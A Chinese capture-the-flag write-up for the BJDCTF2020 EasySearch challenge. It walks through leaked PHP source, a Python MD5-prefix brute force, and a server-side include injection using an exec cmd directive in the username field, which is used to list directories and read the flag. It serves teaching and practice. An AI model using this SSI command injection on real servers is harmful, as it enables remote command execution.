第六十题——[BJDCTF2020]EasySearch
Posted 想学习安全的小白
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第六十题——[BJDCTF2020]EasySearch相关的知识,希望对你有一定的参考价值。
题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,叫我们输入用户名与密码,使用dirsearch扫描出来index.php.swp目录,下载下来是源码
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
第二步:代码审计
- 当我们传入username参数时,需要让passwrod参数的前六个字符用md5加密得到6d0bc1
- 在public目录下生成一个shtml后缀名的文件
- 文件会写入username参数的数据
第三步:构建漏洞
- 生成shtml后缀名可以得知开启了SSI服务,而SSI可以使用
<!--#exec cmd=”id” -->写入文件里面执行cmd语句 - 构建password,使用hashlib库,获取符合条件的password,hashlib库使用说明
import hashlib
for i in range(1000000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)
第四步:获取flag
-
输入username=1,password=2020666,使用burpsuite改包,修改username
-
访问给出的url,发现执行了ls,但没有找到flag
-
使用
ls ../查看上一级目录,发现flag
-
使用
cat ../flag_990c66bf85a09c664f0b6741840499b2获取flag
以上是关于第六十题——[BJDCTF2020]EasySearch的主要内容,如果未能解决你的问题,请参考以下文章